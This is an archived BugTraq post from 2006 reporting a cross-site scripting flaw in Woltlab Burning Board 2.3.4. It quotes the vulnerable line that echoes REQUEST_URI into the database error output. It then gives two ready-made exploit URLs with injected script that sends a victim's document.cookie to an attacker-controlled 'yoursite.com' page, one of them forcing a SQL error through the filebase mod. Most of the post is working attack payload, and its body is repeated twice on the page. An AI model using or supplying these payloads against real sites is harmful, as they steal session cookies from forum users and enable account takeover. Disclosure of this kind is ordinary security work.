BugTraq
Back to list
|
Post reply
Xss in Wbb 2.3.4
Mar 18 2006 02:35PM
r57shell gmail com
hi again friends
i discovered a xss in wbb again ;)
in
wbb/acp/lib/class_db_mysql.php
in the 123.line
$errormsg .= "<b>Script:</b> ".getenv("REQUEST_URI")."\n<br>";
hmm what can we do with that?
if there is an sql db error you may do
/wbb/xx.php?<script>location.href='http://yoursite.com/xss.php?cook='+es
cape(document.cookie)</script>
or you may use filebase mod for make an sql error
like that
http://www.wbbsite.com/filebase_redirect.php?fid='<script>location.href=
'http://yoursite.com/xss.php?cook='+escape(document.cookie)</script>
WwW.SpyMasterSnake.org
Tontonq ;)
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
i discovered a xss in wbb again ;)
in
wbb/acp/lib/class_db_mysql.php
in the 123.line
$errormsg .= "<b>Script:</b> ".getenv("REQUEST_URI")."\n<br>";
hmm what can we do with that?
if there is an sql db error you may do
/wbb/xx.php?<script>location.href='http://yoursite.com/xss.php?cook='+es
cape(document.cookie)</script>
or you may use filebase mod for make an sql error
like that
http://www.wbbsite.com/filebase_redirect.php?fid='<script>location.href=
'http://yoursite.com/xss.php?cook='+escape(document.cookie)</script>
WwW.SpyMasterSnake.org
Tontonq ;)
[ reply ]